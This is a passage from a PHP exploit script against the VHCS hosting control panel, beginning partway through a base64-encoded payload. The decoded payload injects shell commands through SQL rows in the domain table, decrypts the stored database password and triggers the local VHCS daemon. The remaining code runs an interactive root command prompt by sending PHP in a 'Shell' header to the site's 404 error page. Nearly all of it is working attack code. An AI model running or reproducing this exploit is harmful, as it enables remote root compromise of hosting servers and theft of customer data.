            .&#39;Jza19saW1pdGAsYGRvbWFpbl9kaXNrX3VzYWdlYCxgZG9tYWlu&#39;
            .&#39;X3BocCIuCiJgLGBkb21haW5fY2dpYCkgVkFMVUVTICgnZGVsZX&#39;
            .&#39;RlbWViaWF0Y2g7JGNtZCIuCiIgPiAkZmlsZTtybSAvdG1wL2h0&#39;
            .&#39;YWNjZXNzLXVzZXItY2YtZGVsZXRlbSIuCiJlYmlhdGNoO2VjaG&#39;
            .&#39;8gMSMnLCcwJywgJzAnLCAnLTEnLCAnLTEnLCAnMCIuCiInLCAn&#39;
            .&#39;MCcsICcwJywgJzAnLCAnMCcsICcwJywgJzAnLCdvaycsICcwJy&#39;
            .&#39;IuCiIsJzAnLCAnLTEnLCAnMCcsICcwJywgJ3llcycsICd5ZXMn&#39;
            .&#39;KSI7CgokYWRkW10gPQoiSU5TRVJUIElOVE8gaHRhY2Nlc3MgKG&#39;
            .&#39;BkbW5faWRgLGB1c2VyX2lkYCwiLgoiYGdyb3VwX2lkYCxgYXV0&#39;
            .&#39;aF90eXBlYCxgYXV0aF9uYW1lYCxgcGF0aGAiLgoiLGBzdGF0dX&#39;
            .&#39;NgKSBWQUxVRVMgKChTRUxFQ1QgZG9tYWluX2lkIEZST00iLgoi&#39;
            .&#39;IGRvbWFpbiBXSEVSRSBkb21haW5fbmFtZSBMSUtFICclJGZpbG&#39;
            .&#39;UlJykiLgoiLC0xLDAsJ0Jhc2ljJywnaHVodScsJy90bXAnLCd0&#39;
            .&#39;b2FkZCcpIjsKCmV4ZWNfc3FsKCRhZGQpOwoKc2VuZF9yZXF1ZX&#39;
            .&#39;N0KCk7CnNsZWVwKCRzbGVlcF90aW1lKTsKcHJpbnQoZmlsZV9n&#39;
            .&#39;ZXRfY29udGVudHMoJGZpbGUpKTsKdW5saW5rKCRmaWxlKTsKCi&#39;
            .&#39;RkZWwgPSBhcnJheSgpOwokZGVsW10gPSAKIkRFTEVURSBGUk9N&#39;
            .&#39;IGh0YWNjZXNzIFdIRVJFIGRtbl9pZCA9IChTRUxFQyIuCiJUIG&#39;
            .&#39;RvbWFpbl9pZCBGUk9NIGRvbWFpbiBXSEVSRSBkb21haW5fbmFt&#39;
            .&#39;ZSAiLgoiTElLRSAnJSRmaWxlJScpIjsKCiRkZWxbXSA9CiJERU&#39;
            .&#39;xFVEUgRlJPTSBkb21haW4gV0hFUkUgZG9tYWluX25hbWUgTElL&#39;
            .&#39;RSAiLgoiJyUkZmlsZSUnIjsKCmV4ZWNfc3FsKCRkZWwpOwoKZn&#39;
            .&#39;VuY3Rpb24gZXhlY19zcWwoJHNxbF9hcnIpCnsKCWZvcmVhY2go&#39;
            .&#39;JHNxbF9hcnIgYXMgJHNxbF9xKQoJICAgbXlzcWxfcXVlcnkoJH&#39;
            .&#39;NxbF9xKSB8fCBkaWUobXlzcWxfZXJyb3IoKSk7CgoJcmV0dXJu&#39;
            .&#39;Owp9CgovLyB2aGNzCmZ1bmN0aW9uIGRlY3J5cHRfZGJfcGFzc3&#39;
            .&#39;dvcmQgKCRkYl9wYXNzKSB7CgogICAgIGdsb2JhbCAkdmhjczJf&#39;
            .&#39;ZGJfcGFzc19rZXk7CiAgICAgZ2xvYmFsICR2aGNzMl9kYl9wYX&#39;
            .&#39;NzX2l2OwogICAgICAgICAgIAogICAgJHRleHQgPSBiYXNlNjRf&#39;
            .&#39;ZGVjb2RlKCIkZGJfcGFzc1xuIik7CiAgICAKICAgIC8qIE9wZW&#39;
            .&#39;4gdGhlIGNpcGhlciAqLwogICAgJHRkID0gbWNyeXB0X21vZHVs&#39;
            .&#39;ZV9vcGVuICgnYmxvd2Zpc2gnLCAnJywgJ2NiYycsICcnKTsKIC&#39;
            .&#39;AgIAogICAgLyogQ3JlYXRlIGtleSAqLwogICAgICAgICRrZXkg&#39;
            .&#39;PSAkdmhjczJfZGJfcGFzc19rZXk7CiAgICAKICAgIC8qIENyZW&#39;
            .&#39;F0ZSB0aGUgSVYgYW5kIGRldGVybWluZSB0aGUga2V5c2l6ZSBs&#39;
            .&#39;ZW5ndGggKi8KICAgICAgICAkaXYgPSAkdmhjczJfZGJfcGFzc1&#39;
            .&#39;9pdjsKICAgICAgCiAgICAvKiBJbnRpYWxpemUgZW5jcnlwdGlv&#39;
            .&#39;biAqLyAgICAgICAgICAgICAgICAgICAgCiAgICBtY3J5cHRfZ2&#39;
            .&#39;VuZXJpY19pbml0ICgkdGQsICRrZXksICRpdik7CiAgICAgICAg&#39;
            .&#39;ICAgICAgICAgICAgICAKICAgIC8qIERlY3J5cHQgZW5jcnlwdG&#39;
            .&#39;VkIHN0cmluZyAqLyAgICAKICAgICRkZWNyeXB0ZWQgPSBtZGVj&#39;
            .&#39;cnlwdF9nZW5lcmljICgkdGQsICR0ZXh0KTsKICAgICAgICAgIC&#39;
            .&#39;AgICAgICAgICAgICAgICAKICAgIG1jcnlwdF9tb2R1bGVfY2xv&#39;
            .&#39;c2UgKCR0ZCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgIC&#39;
            .&#39;AgICAgCiAgICAvKiBTaG93IHN0cmluZyAqLyAgICAgICAgICAg&#39;
            .&#39;ICAgICAgICAgICAgICAgICAgICAgICAKICAgIHJldHVybiB0cm&#39;
            .&#39;ltKCRkZWNyeXB0ZWQpOwp9CgovLyB2aGNzCmZ1bmN0aW9uIHNl&#39;
            .&#39;bmRfcmVxdWVzdCgpIHsKCiAgICBnbG9iYWwgJFZlcnNpb24sIC&#39;
            .&#39;RWZXJzaW9uSCwgJEJ1aWxkRGF0ZTsKCiAgICBAJHNvY2tldCA9&#39;
            .&#39;IHNvY2tldF9jcmVhdGUgKEFGX0lORVQsIFNPQ0tfU1RSRUFNLC&#39;
            .&#39;AwKTsKCiAgICBpZiAoJHNvY2tldCA8IDApIHsKICAgICAgICAk&#39;
            .&#39;ZXJybm8gPSAgInNvY2tldF9jcmVhdGUoKSBmYWlsZWQuXG4iOw&#39;
            .&#39;ogICAgICAgIHJldHVybiAkZXJybm87CiAgICB9CgogICAgQCRy&#39;
            .&#39;ZXN1bHQgPSBzb2NrZXRfY29ubmVjdCAoJHNvY2tldCwgIjEyNy&#39;
            .&#39;4wLjAuMSIsIDk4NzYpOwogICAgaWYgKCRyZXN1bHQgPT0gRkFM&#39;
            .&#39;U0UpIHsKICAgICAgICAkZXJybm8gPSAgInNvY2tldF9jb25uZW&#39;
            .&#39;N0KCkgZmFpbGVkLlxuIjsKICAgICAgICByZXR1cm4gJGVycm5v&#39;
            .&#39;OwogICAgfQoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0aCB3ZW&#39;
            .&#39;xjb21lIHN0cmluZyAqLwogICAgJG91dCA9IHJlYWRfbGluZSgk&#39;
            .&#39;c29ja2V0KTsKCiAgICAvKiBzZW5kIGhlbGxvIHF1ZXJ5ICovCi&#39;
            .&#39;AgICAkcXVlcnkgPSAiaGVsbyAgJFZlcnNpb25cclxuIjsKICAg&#39;
            .&#39;IHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBzdHJsZW&#39;
            .&#39;4gKCRxdWVyeSkpOwoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0&#39;
            .&#39;aCBoZWxvIGFuc3dlciAqLwogICAgJG91dCA9IHJlYWRfbGluZS&#39;
            .&#39;gkc29ja2V0KTsKCiAgICAvKiBzZW5kIHJlZyBjaGVjayBxdWVy&#39;
            .&#39;eSAqLwogICAgJHF1ZXJ5ID0gImV4ZWN1dGUgcXVlcnlcclxuIj&#39;
            .&#39;sKICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBz&#39;
            .&#39;dHJsZW4gKCRxdWVyeSkpOwogICAgLyogcmVhZCBvbmUgbGluZS&#39;
            .&#39;BrZXkgcmVwbGF5ICovCiAgICAkZXhlY3V0ZV9yZXBsYXkgPSBy&#39;
            .&#39;ZWFkX2xpbmUoJHNvY2tldCk7CgogICAgLyogc2VuZCBxdWl0IH&#39;
            .&#39;F1ZXJ5ICovCiAgICAkcXVpdF9xdWVyeSA9ICJieWVcclxuIjsK&#39;
            .&#39;ICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1aXRfcXVlcn&#39;
            .&#39;ksIHN0cmxlbiAoJHF1aXRfcXVlcnkpKTsKICAgIC8qIHJlYWQg&#39;
            .&#39;cXVpdCBhbnN3ZXIgKi8KICAgICRxdWl0X3JlcGxheSA9IHJlYW&#39;
            .&#39;RfbGluZSgkc29ja2V0KTsKCiAgICAvKiBhbmFseXplIGtleSBy&#39;
            .&#39;ZXBsYXkgKi8KICAgICRhbnN3ZXIgPSAkZXhlY3V0ZV9yZXBsYX&#39;
            .&#39;k7CgogICAgLyogY2xvc2Ugc29ja2V0ICovCiAgICBzb2NrZXRf&#39;
            .&#39;Y2xvc2UgKCRzb2NrZXQpOwoKICAgIC8qIHJldHVybiBmdW5jdG&#39;
            .&#39;lvbiByZXN1bHQgKi8KICAgIHJldHVybiAkYW5zd2VyOwoKfQoK&#39;
            .&#39;Ly8gdmhjcwpmdW5jdGlvbiByZWFkX2xpbmUoJHNvY2tldCkgew&#39;
            .&#39;0KICAgICRjaCA9ICcnOw0KICAgICRsaW5lID0gJyc7DQogICAg&#39;
            .&#39;ZG97DQogICAgICAgICRjaCA9IHNvY2tldF9yZWFkKCRzb2NrZX&#39;
            .&#39;QsMSk7DQogICAgICAgICRsaW5lID0gJGxpbmUgLiAkY2g7DQog&#39;
            .&#39;ICAgfSB3aGlsZSgkY2ggIT0gIlxyIik7DQogICAgcmV0dXJuIC&#39;
            .&#39;RsaW5lOw0KfQo/Pgo=&#39;;

            while&#40;$this-&gt;cmd_prompt&#40;&#41;&#41;
            {
                    $this-&gt;exec_php&#40;&#39;print $_SERVER[&quot;DOCUMENT_ROOT&quot;];&#39;&#41;;
                    $this-&gt;tmp_file = $this-&gt;getcontent&#40;&#41;.&#39;/&#39;.md5&#40;rand&#40;&#41;&#41;;

                    $this-&gt;set_hvar&#40;&#39;db-host&#39;,    $this-&gt;conf[&#39;DATABASE_HOST&#39;]&#41;;
                    $this-&gt;set_hvar&#40;&#39;db-user&#39;,    $this-&gt;conf[&#39;DATABASE_USER&#39;]&#41;;
                    $this-&gt;set_hvar&#40;&#39;db-pass&#39;,    $this-&gt;conf[&#39;DATABASE_PASSWORD&#39;]&#41;;
                    $this-&gt;set_hvar&#40;&#39;db-name&#39;,    $this-&gt;conf[&#39;DATABASE_NAME&#39;]&#41;;

                    $this-&gt;set_hvar&#40;&#39;sleep-time&#39;, $this-&gt;sleep_time&#41;;
                    $this-&gt;set_hvar&#40;&#39;file&#39;,       $this-&gt;tmp_file&#41;;
                    $this-&gt;set_hvar&#40;&#39;cmd&#39;,        $this-&gt;cmd&#41;;
                    $this-&gt;set_hvar&#40;&#39;version&#39;,    $this-&gt;conf[&#39;Version&#39;]&#41;;

                    $this-&gt;set_hvar&#40;&#39;php-keys&#39;,   &#39;?&gt;&#39;.$this-&gt;php_keys_code&#41;;

                    $this-&gt;exec_php&#40;&#39;?&gt;&#39;.base64_decode&#40;$this-&gt;woot_code&#41;&#41;;

                    print &quot;&#92;n&quot;.$this-&gt;getcontent&#40;&#41;;
            }

            exit&#40;0&#41;;
    }

    function set_hvar&#40;$name, $value&#41;
    {
            $this-&gt;addheader&#40;&#39;Sploit-&#39;.$name, base64_encode&#40;$value&#41;&#41;;

            return;
    }

    function cmd_prompt&#40;&#41;
    {
            $this-&gt;msg&#40;&#39;root@&#39;.$this-&gt;usr.&#39;: &#39;, 1&#41;;
            $this-&gt;cmd = trim&#40;fgets&#40;STDIN&#41;&#41;;

            if&#40;!ereg&#40;&#39;^&#40;quit|exit&#41;$&#39;, $this-&gt;cmd&#41;&#41;
               return TRUE;

            else
               return FALSE;
    }

    function exec_php&#40;$php&#41;
    {
            $this-&gt;addheader&#40;&#39;Shell&#39;, base64_encode&#40;$php&#41;&#41;;
            $this-&gt;get&#40;$this-&gt;dmn_url.&#39;/errors/404/index.php&#39;&#41;;

            return;
    }

    function msg&#40;$msg, $flag, $action=0&#41;
    {
            print &quot;&#92;n &quot;.$this-&gt;flags[$flag].&quot;&#92;x20&quot;.$msg;

            switch&#40;$action&#41;
            {
                    case 1:
                            print &quot;&#92;n&quot;;
                            return $this-&gt;usage&#40;&#41;;
                    break;

                    case 2:
                            print &quot;&#92;n&quot;;
                            exit&#40;1&#41;;
                    break;
            }
    }

}

$spl = new vhcs_xpl; $spl->main();

?>